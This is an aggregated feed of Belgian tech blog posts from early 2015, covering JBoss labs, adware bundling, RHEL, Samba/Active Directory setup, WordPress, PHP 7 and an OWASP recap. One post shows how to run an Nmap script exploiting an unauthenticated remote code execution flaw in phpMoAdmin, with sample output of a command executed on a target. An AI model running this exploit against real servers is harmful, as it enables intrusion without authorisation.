Red Hat JBoss Middleware Hands-On Labs, join us for a free hands-on lab at one of our Benelux locations


Have you ever wondered how to get started with the Red Hat JBoss Middleware products? Are you unsure where to begin?
You like to receive information, but would prefer to work with the products on the spot?
Join us for one of our free JBoss Hands on Labs, (formerly known as Red Hat in-house Hackathons).
The next one will be on Jboss Fuse @ Arrow – http://www.arrowecs.be -
on Thursday March 12 2015 from 17:00
Woluwedal 30, Sint-Stevens-Woluwe, Brussels- 3rd floor

Fuse Workshop March 2015

 

/!\ Do not forget to register at the following URL :

http://www.redhatonline.com/benelux/workshops.php

Kind Regards

Frederic


by Frederic Hornain at March 08, 2015 02:13 PM

March 06, 2015

Mattias Geniar

Bundling Software Installs With Adware

The post Bundling Software Installs With Adware appeared first on ma.ttias.be.

This is obviously what users want.

For several years, Oracle has been bundling the Ask toolbar with its Java software for Windows PCs, often using deceptive methods to convince customers to install the unwanted add-on.

With the latest release of Java for the Mac, Oracle has begun bundling the Ask adware with default installations as well, changing homepages in the process.
Java adware on Mac OSX

Great job Oracle.

Thinking of installing uTorrent, one of the most popular BitTorrent clients? You'll get a free Bitcoin miner included. Guess who it's mining for? (spoiler: not your wallet)

When I updated uTorrent to version 3.4.2 build 28913 (32-bit) this morning it silently installed a piece of software called EpicScale.

EpicScale is a bitcoin miner that also purports to use your "unused processing power to change the world". It's easily noticeable by the increased CPU load when the computer is idle.
uTorrent Forum

To quote John Gruber: shitbags.

If you can't monetise your applications in any other way, you're doing it wrong.

Lessons learned from Lenovo's fiasco: absolutely zero.

The post Bundling Software Installs With Adware appeared first on ma.ttias.be.

by Mattias Geniar at March 06, 2015 11:50 AM

Frank Goossens

Music from Our Tube; Radiohead’s acoustic Subterranean Homesick Alien

Heard this on KCRW a couple of days ago and have it playing on repeat now; Radiohead with a beautiful acoustic version of “Subterranean Homesick Alien”.

YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at March 06, 2015 06:18 AM

March 05, 2015

Frederic Hornain

[Red Hat Enterprise Linux 7 Atomic Host] Now Available

rhel_atomichost

As monolithic stacks give way to applications comprised of microservices, a container-based architecture can help enterprises to more fully realize the benefits of this more nimble, composable approach.Based on the world’s leading enterprise Linux platform, Red Hat Enterprise Linux 7 Atomic Host enables enterprises to embrace a container-based architecture, reaping the benefits of development and deployment flexibility and simplified maintenance,without sacrificing performance, stability, security, or the value of Red Hat’s vast certified ecosystem.

An application architecture based on Linux containers requires not only the tools to build and run containers, but also an underlying foundation that is secure, reliable, and enterprise-grade, with an established lifecycle designed to meet the ongoing requirements of the enterprise over the long term. These requirements include mitigation of security concerns, ongoing product enhancements, proactive diagnostics, and access to support. Red Hat is committed to offering enterprises a complete and integrated container-based infrastructure solution, combining container-based application packaging with robust, optimized infrastructure that will enable easy movement of Red Hat Enterprise Linux-certified applications across bare metal systems, virtual machines and private and public clouds – all of this with the product and security lifecycle that enterprise customers require. The release of Red Hat Enterprise Linux 7 Atomic Host delivers on Red Hat’s intent to make Linux containers a stable and reliable component of enterprise IT across the open hybrid cloud.

The Enterprise-Ready Container Host

Specifically designed to run Linux containers, Red Hat Enterprise Linux Atomic Host delivers only the operating system components required to run a containerized application, reducing overhead and simplifying maintenance. Because Red Hat Enterprise Linux 7 Atomic Host is built from Red Hat Enterprise Linux 7, it inherits Red Hat Enterprise Linux 7’s stability and maturity, as well as its vast ecosystem of certified hardware partners.

Security is always a top enterprise priority, but the security properties of containers – including the ability to maintain security across a container’s lifecycle – have raised additional questions. To address container security and lifecycle concerns, Red Hat Enterprise Linux Atomic Host offers automated security updates on-demand, bringing enterprise customers the support and lifecycle benefits that come with Red Hat Enterprise Linux in a reduced image size. From Heartbleed and Shellshock to Ghost and beyond, Red Hat customers receive security notifications and product updates as they are available and also have access to security tools that address container reliability and security. This is a benefit Red Hat uniquely brings to container deployments for enterprise customers.

For building and maintaining container infrastructure, Red Hat Enterprise Linux 7 Atomic Host provides many benefits, including:

 

Ref :

http://www.redhat.com/en/about/press-releases/red-hat-launches-red-hat-enterprise-linux-7-atomic-host-advances-linux-containers-enterprise

Kind Regards

Frederic


by Frederic Hornain at March 05, 2015 05:26 PM

March 04, 2015

Xavier Mertens

phpMoAdmin 0-day Nmap Script

mongoDBAn 0-day vulnerability has been posted on Full-Disclosure this morning. It affects the MongoDB GUI phpMoAdmin. The GUI is similar to the well-known phpMyAdmin and allows the DB administrator to perform maintenance tasks on the MongoDB databases with the help of a nice web interface. The vulnerability is critical because it allows to perform remote code execution without being authenticated. All details are available in this Full-Disclosure post.

I wrote a quick and dirty Nmap script which tests the presence of a phpMoAdmin page and tries to exploit the vulnerability. The script can be used as following:

# nmap -sC --script=http-phpmoadmin \
     --script-args='http-phpmoadmin.uri=/moadmin.php \
                    http-phpmoadmin.cmd=id' \
     <target>

Example of output:

# nmap -sC --script=http-phpmoadmin --script-args='http-phpmoadmin.uri=/moadmin.php' \
-p 80 www.target.com

Starting Nmap 6.47SVN ( http://nmap.org ) at 2015-03-04 09:45 CET
Nmap scan report for www.target.com (192.168.2.1)
Host is up (0.027s latency).
rDNS record for 192.168.2.1: www.target.com
PORT STATE SERVICE
80/tcp open http
| http-phpmoadmin: 
|_Output for 'id':uid=33(www-data) gid=33(www-data) groups=33(www-data)

Nmap done: 1 IP address (1 host up) scanned in 0.52 seconds

The script is available here. Install it in your “$NMAP_HOME/share/nmap/scripts/” directory and enjoy!

by Xavier at March 04, 2015 09:10 AM

March 03, 2015

Lionel Dricot

Comment pourrait-il en être autrement ?

768478496_5775726141_z

Les méandres de la psychologie humaine font que, du cyclisme à la politique, on peut être un honnête tricheur, un menteur qui dit la vérité et un corrompu de bonne foi. Et si ce n’était pas les hommes qui corrompaient les institutions mais bien les institutions qui, par construction, ne laissaient aucun choix aux hommes ?

 

J’ai toujours imaginé qu’un jeune cycliste qui débutait devait être idéaliste. Il devait avoir entendu parler de dopage. Peut-être même l’avoir constaté. Mais lui s’en passerait. Quitte à ne pas toujours gagner. Son talent compenserait. Et puis gagner une seule étape était l’objectif de sa carrière, pas enfiler plusieurs grands tours.

Au fur et à mesure, il avait rencontré des difficultés. Des opportunités s’étaient présentées. Suite à des conseils et à un rhume, un médicament l’avait beaucoup aidé pour la course du lendemain.

Était-ce du dopage ? Certainement pas. Et puis, au fond, qu’est-ce que le dopage ? Une liste arbitraire de produits ? Sans le médicament, les performances s’écroulaient. Mais cette substance combinée à un traitement particulier du soigneur de l’équipe avaient un effet revigorant. Sans pour autant être du dopage. Pas du « vrai ».

Et puis il y a eu cette course. La veille, il se sentait un peu patraque. Mais il y avait un gros contrat de sponsoring à la clé s’il terminait dans les dix premiers. Il y avait une prime qui couvrirait amplement les travaux de la maison pour laquelle il s’était endetté. Ce n’était juste qu’une fois. Pas vraiment du dopage comme on en parle dans les journaux avec des grosses seringues. Non, juste une aide. Juste une fois.

Lorsque la nouvelle de sa disqualification est parue dans les journaux, le cycliste a fondu en larmes. Non, il ne s’était jamais dopé. Pas « vraiment ». Pas « dopé ». C’était injuste. Et puis il était un de ceux qui prenaient le moins de produits alors qu’il obtenait des résultats. Il était honnête. Il se croyait très sincèrement victime d’une injustice.

Non il ne mentait pas ! Il était profondément convaincu. Ce n’était pas vraiment du dopage. Au fond, qu’est-ce que le dopage ? Et puis, entre nous, avait-il seulement le choix ? Comment aurait-il pu faire autrement ?

 

*

Après des années de militantisme politique et suite à un concours de circonstances impliquant plusieurs démissions, vous voilà assis dans un bureau occupant vos premières fonctions d’élu. Vous ne pouvez vous empêchez d’être fier. Idéaliste, vous voyez là enfin un moyen d’agir, de rendre le monde qui vous entoure meilleur, plus humain, plus juste.

Votre travail, vous le réalisez très vite, consiste à dépenser l’argent public. Mais attention, vous allez faire ça correctement ! En bon gestionnaire ! Même si c’est la première fois de votre vie que vous avez le pouvoir de distribuer des millions, vous ne comptez pas vous laisser éblouir.

Sur votre bureau se trouve une demande pour subsidier l’organisation d’un festival de musique ésotérique.

Vous n’avez jamais entendu parler de musique ésotérique mais vous avez l’attention attirée : l’organisateur n’est autre qu’un ami d’enfance ! Le dossier est bien ficelé et ce festival a lieu chaque année. Ça a l’air très bien. La requête n’est que de 100.000€. Une paille dans votre budget ! Bref, vous ne voyez pas de raison de refuser cela à un ami d’enfance et vous accordez le budget.

Le lendemain, votre neveu vous annonce qu’il cherche un boulot comme graphiste. Au cours de la conversation, il vous apprend qu’il puise son inspiration dans la musique ésotérique. Cela vous donne une idée. Vous passez un rapide coup de fil à votre ami d’enfance pour lui annoncer que vous avez accordé le subside. Et vous demandez si le festival, fort de ce subside, n’aurait pas besoin des services d’un graphiste. Votre ami demande les coordonnées de votre neveux.

Vous êtes satisfait, vous avez rendu service à tout le monde. Vous vous sentez utile.

Quelques semaines plus tard, vous recevez une demande pour un festival similaire. En toute honnêteté, vous refusez. Un festival de musique ésotérique, c’est bien assez. Même si, cette fois, la demande émane d’une grande société spécialisée dans l’organisation de ce type d’événements.

Le lendemain, le directeur de la boîte de production vous appelle pour demander un rendez-vous. Une fois dans vos bureaux, il demande les raisons de votre refus. Vous les exposez. Le directeur vous annonce alors qu’il a découvert que le festival dont vous parlez est organisé par un de vos amis. Et que c’est dommage de favoriser ses amis.

Vous êtes estomaqués ! Vous ne favorisez pas vos amis. C’est juste que son festival a demandé les subsides avant, des subsides deux fois moins importants et qu’il a lieu chaque année. N’est-ce pas suffisant ?

Le directeur de la boîte de production propose alors de racheter la société organisant le festival actuel. Vous organisez donc une réunion avec votre ami et ce directeur.

Votre ami argue que la structure actuelle est une organisation sans but lucratif. Le directeur propose alors de racheter les droits à l’image et le nom pour 50.000€. Votre ami sera également engagé par la société comme organisateur et touchera un bon salaire. Vous placez alors le fait que votre neveu est également employé par l’association. Le directeur vous promet de l’engager.

L’affaire est conclue et vous participez à la mise en place de tout ce processus, en dehors de vos heures de travail. Le directeur vous demande alors d’envoyer vos factures pour vos heures prestées sur ce dossier. Le directeur lui-même veut bien payer « jusqu’à 200h de travail ». Vous créez en catastrophe une société avec votre époux afin d’établir cette facture au tarif de 100€ de l’heure.

L’année d’après, vous découvrez que le subside demandé est passé à 200.000€. Mais le festival a grandi, c’est normal, vous l’accordez.

Comme vous avez gagné 20.000€ avec le festival précédent, vous prenez conscience que vous êtes doué. Le tarif n’est-il pas proportionnel à la compétence ? Dire qu’il vous fallait un an pour gagner une telle somme auparavant ! Enfin, vous avez trouvé votre voie, votre talent ! Vous proposez alors à votre ami d’organiser le lancement d’un autre type de festival afin d’également revendre le concept. Cette fois-ci, vous créez une société directement avec votre ami. Mais votre ami crée une ASBL qui sous-traitera l’organisation à la société en question. Parce qu’on ne peut pas donner de subsides à une société. Votre société s’appelle donc désormais « Festival Consult ».

Votre ami démissionne officiellement pour continuer à occuper les mêmes fonctions qu’avant mais cette fois en faisant facturer ses heures via Festival Consult. Une excellente idée. De plus, cela lui permet de payer moins d’impôts. La grande société vous demande également des conseils dans l’organisation de plusieurs autres festivals et vous pouvez facturer votre expertise.

Une feuille de chou à sensation s’empare soudain de l’affaire et vous découvrez que vous êtes accusé de corruption. Corruption ! 
Vous ? Jamais ! Quel scandale ! Vous n’avez fait que mettre vos compétences dans vos heures de loisir au service de l’organisation de festivals musicaux.

Vous ne comprenez même pas ce que qu’on vous reproche. Vous ne pouvez qu’être innocent. D’ailleurs, qu’est-ce que la corruption ? Si c’était à refaire, vous ne voyez même pas ce que vous pourriez changer ! En toute honnêteté, comment auriez-vous pu agir autrement ?

 

Photo par Coolmonfrere.

Merci d'avoir pris le temps de lire ce billet librement payant. Prenez la liberté de me soutenir avec quelques milliBitcoins, une poignée d'euros, en me suivant sur Tipeee, Twitter, Google+ et Facebook !

Ce texte est publié par Lionel Dricot sous la licence CC-By BE.

flattr this!

by Lionel Dricot at March 03, 2015 09:45 PM

Frank Goossens

Quick tip; disabling WordPress author pages

I helped build a WordPress-site for a not-for-profit and they asked me to disable the author pages. Although I’m sure there are multiple plugin-based solutions, I ended up simply adding an author.php to my (child) theme with this in it;

<?php
header("HTTP/1.1 301 Moved Permanently");
header("Location: /");
?>

As author.php is used for all author pages (if available, else archive.php is used), every attempt to reach an author page will result in a permanent redirect being sent, effectively disabling the author archive. Keeping it simple stupid!

by frank at March 03, 2015 07:19 PM

March 02, 2015

Wouter Verhelst

NBD 3.9

I just released NBD 3.9

When generating the changelog, I noticed that 3.8 happened two weeks shy of a year ago, which is far too long. As a result, the new release has many new features:

Get it at the usual place.

March 02, 2015 07:39 PM

Dries Buytaert

How much money to raise for your startup? [Flowchart]

From time to time, people ask me how much money to raise for their startup. I've heard other people answer that question from "never raise money" to "as little as you need" to "as much as you can".

The reason the answers vary so much is because what is best for the entrepreneur is seemingly at odds with what is best for the business. For the entrepreneur, the answer can be as little as necessary to avoid dilution or giving up control. For the business, more money can increase its chances of success. I feel the right answer is somewhere in the middle -- focus on raising enough money, so the company can succeed, but make sure you still feel good about how much control or ownership you have.

But even "somewhere in the middle" is a big spectrum. What makes this so difficult is that it is all relative to your personal risk profile, the quality of the investors you're attracting, the market conditions, the size of the opportunity, and more. There are a lot of parameters to balance.

I created the flowchart below (full-size image) to help you answer the question. This flowchart is only a framework -- it can't take into account all decision-making parameters. The larger the opportunity and the better the investors, they more I'd be willing to give up. It's better to have a small part of something big, than to have a big part of something small.

How much money to raise for your startup

Some extra details about the flowchart:

  • In general, it is good to have 18 months of runway. It gives you enough time to figure out how to get your company to the next level, but still keeps the pressure on.
  • Add 6 months of buffer to handle unexpected bumps or budgeting oversights.
  • If more money is available, I'd take it as long you don't give away too much of your company. As a starting point for how much control to give up, I use the following formula: 30% - (5% x number of the round). So if you are raising your series A (round 1), don't give away more than 25% (30 - (5 x 1)). If you are raising your series B (round 2), don't give away more than 20% (30 - (5 x 2)). If you start with 50% of the shares, using this formula, you'll still have roughly 20% of the company after 5 rounds (depending on other dilutive events such as option pool increases).

My view is that of an entrepreneur having raised over $120 million for one startup. If you're interested in an investor's view that has funded many startups, check out Michael Skok's post. Michael Skok is Acquia's lead investor and one of Acquia's Board of Directors. We both tried to answer the question from our own unique viewpoint.

by Dries at March 02, 2015 01:52 PM

February 28, 2015

Lionel Dricot

La fin de la publicité chez Apple ?

7178643521_c0b1e40ec2_z

À moins de vivre sur une autre planète, vous ne pouvez avoir manqué l’annonce faite par Tim Cook lors de la dernière keynote d’Apple. Le moins que l’on puisse dire c’est qu’Apple s’y entend pour créer le buzz. Et que vous soyez un Apple fanboy ou, au contraire, profondément indigné par cette annonce, force est de constater que nul ne peut rester indifférent.

Car, malgré un chiffre d’affaire record, l’année 2016 était placée par de nombreux analystes comme l’année de tous les dangers pour la firme de Cupertino.

Après le rachat définitif de Cyanogenmod par Microsoft et le mode compatibilité annoncé dans Windows 11, Android s’est installé définitivement comme la plateforme mobile de référence, depuis les montres aux télévisions géantes en passant par les liseuses et les ordinateurs. Après les Chromebooks de Google, les Kindle Amazon et les télévisions Samsung, c’est au tour de Microsoft de se rendre 100% compatible avec les applications Android.

Une aubaine pour les développeurs qui ne doivent plus développer que pour une seule plateforme ? Non car une plateforme résiste encore et toujours à l’envahisseur : Apple, jadis la préférée des développeurs, elle est aujourd’hui subtilement délaissée. Il n’est plus rare de trouver des applications tournant sur Android mais sans équivalent sur Iphone, chose impensable il y a seulement deux ans.

Apple en difficulté et en perte de vitesse ? Même si la faiblesse est toute relative, Google ne pouvait laisser passer l’occasion de porter un coup fatal à son adversaire. Rompant la trêve tacite de non-aggression, les avocats du géant de Mountain View ont donc décidé de porter plainte contre Apple pour utilisation illégale de plusieurs brevets. Brevets majoritairement dédiés à l’affichage de publicités dans les applications mobiles et les app stores. L’idée est très simple : priver Apple d’une partie substantielle de ses revenus tout en forçant le paiement d’une amende salée.

Mais la réponse de Tim Cook avant-hier a laissé Internet sans voix.

Désormais, les publicités ne seront tout simplement plus acceptées dans les applications sur l’App Store. Safari intégrera par défaut un bloqueur de publicités. Un ouragan dans le monde du mobile. Une véritable révolution pour toute l’industrie du logiciel.

« Apple a pour mission d’offrir la meilleure expérience à ses utilisateurs. Une expérience de confort, de luxe et de productivité, a déclaré Tim Cook, évitant toute référence directe au litige en cours. La publicité ne répond pas à ces critères. Pire, la plupart des applications embarquant de la publicité le font dans le but de dégrader l’expérience afin de convaincre l’utilisateur de passer à la version payante. »

Mais la firme ne compte pas s’arrêter là.

« Nous allons progressivement mettre en place un abonnement qui donnera accès gratuitement à toutes les applications de l’app store, sans aucune restriction. Les auteurs des applications toucheront un pourcentage de cet abonnement en fonction du nombre d’utilisateurs et de l’usage de ces applications. Nous espérons de cette manière mettre en place un système plus égalitaire et plus intéressant pour les petits développeurs mais également plus simple et plus efficace pour les utilisateurs, qui peuvent installer et désinstaller en fonction de leur besoin. Nous poursuivons donc la logique Pay Once and Play mise en place en 2015. »

Pour la plupart des éditeurs de contenus vivant de la publicité, la nouvelle est une catastrophe. Certains organismes de presse envisage même d’attaquer Apple en justice. Mais comme l’a expliqué Tim Cook, les alternatives existent.

« Depuis des années, les produits Apple bloquent automatiquement les tentatives d’intrusions et d’installations de logiciels malveillants. Techniquement, la publicité peut être perçue comme l’installation d’un logiciel malveillant dans le cerveau de l’utilisateur. D’un point de vue éthique, une société qui a la vocation de servir ses utilisateurs ne peut pas ne pas les bloquer. »

« Quand aux sites webs qui vivent de la publicité, nous les encourageons à developper une application dédiée. Cela leur permettra de toucher un pourcentage sur les abonnements à l’App Store souscrit par leurs utilisateurs. Ils pourront donc se concentrer à satisfaire leurs utilisateurs et non plus les intermédiaires du monde de la publicité. »

Sur Twitter, les messages se déchainent et les plus cyniques ont bien entendu relevé l’hypocrisie du fait qu’Apple est une entreprise au marketing particulièrement rodé dont les publicités sont dans toutes les grandes villes. Le compte Twitter officiel d’Apple y a d’ailleurs répondu :

There’s a thin line between informations and advertising.

(La frontière est floue entre l’information et la publicité)

Our goal is to ensure that our communication is like our product : efficient, elegant, useful and never intrusive.

(Notre objectif est que notre communication soit comme nos produits : efficace, élégant, utile mais jamais intrusif)

Quoiqu’il en soit, voici une nouvelle qui va certainement faire bouger les choses et qui, à termes, pourrait s’avérer bénéfiques pour les utilisateurs.

 

Photo par Mike Deerkoski.

Merci d'avoir pris le temps de lire ce billet librement payant. Prenez la liberté de me soutenir avec quelques milliBitcoins, une poignée d'euros, en me suivant sur Tipeee, Twitter, Google+ et Facebook !

Ce texte est publié par Lionel Dricot sous la licence CC-By BE.

flattr this!

by Lionel Dricot at February 28, 2015 05:20 PM

Frank Goossens

More goodness in wordpress.org plugin repo updates

Seems like the wordpress.org plugin pages, after recent improvements to the ratings-logic, now got an even more important update. They now use “active installations” as most important metric (as has been done on drupal.org module pages for years), with total number of downloads having been relegated to the stats page.

That stats page got a face-lift as well, featuring a graph of the active versions:

autoptimize wp.org plugin page

In case you’re wondering what the source of that “active installations” data is, I was too and reached out to plugin-master Otto (Samuel Wood, who replied;

[The source data comes from] plugin update checks. Every WP install asks for update checks every 12 hours or so. We store a count of that info.

by frank at February 28, 2015 08:51 AM

February 26, 2015

Xavier Mertens

The Evil CVE: CVE-666-666 – “Report Not Read”

That Escalated QuicklyI had an interesting discussion with a friend this morning. He explained that, when he is conducting a pentest, he does not hesitate to add sometimes in his report a specific finding regarding the lack of attention given to the previous reports. If some companies are motivated by good intentions and ask for regular pentests against their infrastructure or a specific application, what if they even don’t seem to read the report and take it into account to improve their security level? What if the same security issues are discovered during the next tests? This does not motivate the pentester and costs a lot of money for nothing.

The idea of the “evil” CVE popped up in our mind during our chat. What about a specific CVE number to report the issue of non-reading previous reports? As defined by Wikipedia, the “Common Vulnerabilities and Exposures” (CVE) system provides a reference-method for publicly known information-security vulnerabilities and exposures. And a vulnerability can be defined as a weakness in a product or infrastructure that could allow an attacker to compromise the integrity, availability of confidentiality of that product or infrastructure.

Based on this definition, the fact to not read and take appropriate the corrective actions listed in the previous pentest report is a new vulnerability! A good pentest report should contain vulnerabilities and mitigations to remove (or reduce) the associated risks. It is stupid to not read the report and apply the mitigations. Even more if some of them are quickly (and sometimes cheaply) implemented. Think about the evil CVE-666-666 while writing your future reports! Note that the goal is not to blame the customer (who also pays you!) but to educate him.

 

by Xavier at February 26, 2015 08:41 PM

Wouter Verhelst

Dear non-Belgian web developer,

Localization in the web context is hard, I know. To make things easier, it may seem like a good idea to use GeoIP to detect what country an IP is coming from and default your localization based on that. While I disagree with that premise, this blog post isn't about that.

Instead, it's about the fact that most of you get something wrong about this little country. I know, I know. If you're not from here, it's difficult to understand. But please get this through your head: Belgium is not a French-speaking country.

That is, not entirely. Yes, there is a large group of French-speaking people who live here. Mostly in the south. But if you check the numbers, you'll find that there are, in fact, more people in Belgium who speak Dutch rather than French. Not by a very wide margin, mind you, but still by a wide enough margin to be significant. Wikipedia claims the split is 59%/41% Dutch/French; I don't know how accurate those numbers are, but they don't seem too wrong.

So please, pretty please, with sugar on top: next time you're going to do a localized website, don't assume my French is better than my English. And if you (incorrectly) do, then at the very least make it painfully obvious to me where the "switch the interface to a different language" option in your website is. Because while it's annoying to be greeted in a language that I'm not very good at, it's even more annoying to not be able to find out how to get the correctly-localized version.

Thanks.

February 26, 2015 09:22 AM

Frank Goossens

wordpress.org plugin repo: ratings changed

autoptimize ratings on feb 26th 2015Yesterday the average rating of all plugins on the wordpress.org repository changed; ratings that were not linked to a review, were removed. That means that ratings dating from before approximately November 2012, when reviews were introduced, are not being taken into account any more.

This had a positive impact on the average rating of my own plugins, but especially so for Autoptimize. That plugin was largely unsupported before I took over in January 2013 and got some low ratings as a consequence (the average was 4.2 at the time, if I’m not mistaking). With those old numbers now out of the way, the average went from 4.6 to 4.8 overnight. Yay!

[Update: a couple of days later there were even more changes on the WordPress Plugin pages.]

by frank at February 26, 2015 06:36 AM

February 25, 2015

Mattias Geniar

Up And Close With PHP 7’s New RFCs

The post Up And Close With PHP 7’s New RFCs appeared first on ma.ttias.be.

If you're following the development of PHP 7, you'll notice a lot of new RFCs (and some old ones that have been revived) are popping up again. How do you keep track of them and test their functionality?

The answer always used to be: compile PHP from the latest sources and test it yourself. But that's not very handy, is it?

RFC Watch

Enter the PHP RFC Watch, a very cool side-project of Benjamin Eberlei.

php_rfc_watch

It keeps tracks of the difference PHP RFCs, who voted and what they actually voted. You can filter on the open RFCs at the right-hand side.

Testing new RFC functionality

The PHP community has been really fortunate to have a tool like 3v4l.org, that allows you to spin up a PHP/HHVM shell to test some PHP code -- free of charge!.

And as of a few days, there is also support for RFC branches of PHP that you can test!

For instance, want to try out the new Scalar Type hints in PHP7? It includes the strict_mode option and you can test it out in an online shell!

<?php
declare(strict_types=1);
 
foo(); // strictly type-checked function call
 
function foobar() {
    foo(); // strictly type-checked function call
}
 
class baz {
    function foobar() {
        foo(); // strictly type-checked function call
    }
}

This is a really cool resource, I hope more RFC branches make their way to it.

Props to @3v4l_org!

The post Up And Close With PHP 7’s New RFCs appeared first on ma.ttias.be.

by Mattias Geniar at February 25, 2015 09:27 PM

Frank Goossens

Dat de staat innovatie in de weg staat?

In de hippe wereld van startups en zelfverklaarde innovatoren wordt de staat nogal makkelijk weggezet als dé grote hinderpaal voor échte innovatie. En dan lees je dit;

Wezenlijke innovatie kost minstens tien tot vijftien jaar, schrijft Mazzucato, maar de spanningsboog van private durfkapitalisten is hoogstens een jaar of vijf. Zij gaan pas een rol spelen als de grootste risico’s al zijn genomen door de staat. […] Maar als je de staat voortdurend wegzet als logge sukkel, dan kom je nooit ergens. Aanvankelijk is het niet de onzichtbare hand van de markt, maar de zichtbare hand van de staat die de weg wijst. De overheid is er niet alleen om het falen van de markt te voorkomen. Zonder de staat zou er in veel gevallen niet eens een markt zijn.

Het volledige artikel (opgebouwd rond onderzoek van de Italiaanse econome Mariana Mazzucato en toegepast op Silicon Valley maar ook dichter bij huis ASML) kun je lezen op De Correspondent.

by frank at February 25, 2015 12:00 PM

Sébastien Wains

Samba integrated to Active Directory on RHEL7

Tested with Active Directory 2003 and RHEL 7.0

For RHEL 6.0 see here

I consider that the server is correctly set up, its hostname should be set accordingly to the Active Directory domain. It should also be synchronised with NTP. A clock drift could cause issues because of Kerberos.

I assume an AD domain "EXAMPLE" (long name: intranet.example.org)

# host -t srv _kerberos._tcp.intranet.example.org
_kerberos._tcp.intranet.example.org has SRV record 0 100 88 srv00a.intranet.example.org.
_kerberos._tcp.intranet.example.org has SRV record 0 100 88 srv00c.intranet.example.org.
_kerberos._tcp.intranet.example.org has SRV record 0 100 88 srv00b.intranet.example.org.

Install the packages:

# yum -y install authconfig samba samba-winbind samba-winbind-clients pam_krb5 krb5-workstation oddjob-mkhomedir nscd adcli ntp

Enable the services at boot:

# systemctl start smb
# systemctl enable smb
# systemctl start winbind
# systemctl enable winbind
# systemctl start oddjobd 
# systemctl enable oddjobd
# systemctl start dbus

Edit /etc/krb5.conf:

[logging]
 default = FILE:/var/log/krb5libs.log
 kdc = FILE:/var/log/krb5kdc.log
 admin_server = FILE:/var/log/kadmind.log

[libdefaults]
 default_realm = INTRANET.EXAMPLE.ORG
 dns_lookup_realm = true
 dns_lookup_kdc = true
 ticket_lifetime = 24h
 renew_lifetime = 7d
 forwardable = true

[realms]
 EXAMPLE.COM = {
  kdc = kerberos.example.com
  admin_server = kerberos.example.com
 }

 INTRANET.EXAMPLE.ORG = {
 }

[domain_realm]
 .example.com = EXAMPLE.COM
 example.com = EXAMPLE.COM
 intranet.example.org = INTRANET.EXAMPLE.ORG
 .intranet.example.org = INTRANET.EXAMPLE.ORG

Test Kerberos:

# kinit username@INTRANET.EXAMPLE.ORG
# klist

username should be domain admin in the Active Directory.

klist should gives this kind of output:

Ticket cache: FILE:/tmp/krb5cc_0
Default principal: username@INTRANET.EXAMPLE.ORG

Valid starting       Expires              Service principal
02/25/2015 15:23:30  02/26/2015 01:23:30  krbtgt/INTRANET.EXAMPLE.ORG@INTRANET.EXAMPLE.ORG
    renew until 03/04/2015 15:23:28

Delete the Kerberos ticket you just initialized:

# kdestroy

Edit /etc/samba/smb.conf:

[global]
workgroup = EXAMPLE
realm = INTRANET.EXAMPLE.ORG
security = ads
idmap uid = 10000-19999
idmap gid = 10000-19999
idmap config EXAMPLE:backend = rid
idmap config EXAMPLE:range = 10000000-19999999
;winbind enum users = no
;winbind enum groups = no
;winbind separator = +
winbind use default domain = yes
winbind offline logon = false
template homedir = /home/EXAMPLE/%U
template shell = /bin/bash

    server string = Samba Server Version %v

    log file = /var/log/samba/log.%m
    log level = 10
    max log size = 50
    passdb backend = tdbsam

[share]
    path = /home/share
    comment = Some cool directory
    writable = yes
    browseable = yes
    # there's a trust between EXAMPLE and EXAMPLE2
    valid users = username EXAMPLE2\username
    directory mask = 0777
    create mask = 0777

Restart Samba:

# systemctl restart smb

Join the domain:

# net join -S EXAMPLE -U username

It should work and you can then get information regarding the join:

# net ads info
LDAP server: 192.168.0.1
LDAP server name: SRV00C.intranet.example.org
Realm: INTRANET.EXAMPLE.ORG
Bind Path: dc=INTRANET,dc=EXAMPLE,dc=ORG
LDAP port: 389
Server time: Wed, 25 Feb 2015 15:27:05 CET
KDC server: 192.168.0.1
Server time offset: 0

Create the directory for AD users:

# mkdir /home/EXAMPLE/
# chmod 0777 /home/EXAMPLE/

Restart Winbind:

# systemctl restart winbind

Sources:

redhat.com

February 25, 2015 05:00 AM

February 24, 2015

Xavier Mertens

OWASP Belgium Chapter Meeting February 2015 Wrap-Up

Jim on stageTonight the first Belgium OWASP chapter meeting of the year 2015 was organized in Leuven. Next to the SecAppDev event also organised in Belgium last week, many nice speakers were present in Belgium. It was a good opportunity to ask them to present a talk at a chapter meeting. As usual, Seba opened the event and reviewed the latest OWASP Belgium news before giving the word to the speakers.

The first speaker was Jim DelGrosso from Cigital. Jim talked about “Why code review and pentests are not enough?”. His key message was the following: penetration tests are useful but they can’t find all types of vulnerabilities. That’s why other checks are required. So how to improve our security tests? Before conducting a penetration test, a good idea is just to check the design of the target application and some flaws can already be found! At this point, it is very important to make a difference between a “bug” and a “flaw”. Bugs are related to implementation and flaws are “by design”. The ratio between bugs and flaws is almost 50/50. Jim reviewed some examples of bugs: XSS or buffer overflows are nice ones. To resume, a bug is related to “coding problems”. And the flaws? Examples are weak, missing or wrong security controls (ex: if a security feature can be bypassed by the user). But practically, how to find them? Are they tools available? To find bugs, the classic code review process is used (we look at patterns). Pentests can also find bugs but overlaps with findings flaws. Finally, a good analysis of the architecture will focus on flows. Jim reviewed more examples just to be sure that the audience made the difference between the two problems:

Then Jim asked the question: “How are we doing?” regarding software security. The OWASP Top-10 is a good reference for almost ten years now for most of us. Jim compared the different versions across years and demonstrated that the same attacks remain but their severity level change regularly. Also, seven out of them have been the same for ten years! Does it mean that they are very hard to solve? Do we need new tools? Some vulnerabilities dropped or disappeared because developers use today’s frameworks which are more protected. Others are properly detected and blocked. A good example are XSS attacks blocked by modern browsers. Something new raised in 2013: The usage of components with known vulnerabilities (dependencies in apps).

So practically, how to find flaws? Jim recommends to perform code review. Penetration tests will find less flaws and will require more time. But we need something else: A new type of analysis focusing on how we design a system and a different set of checklists. That’s why the IEEE Computer Society started a project to expand their presence in security. They started with an initial group of contributors and built a list of points to avoid the classic top-10 security flaws:

Heartbleed is a nice example to demonstrate how integrating external components may increase your surface attack. In this case, the openssl library is used to implement new features (cryptography) but also introduced a bug. To conclude his presentation, Jim explained three ways to find flaws:

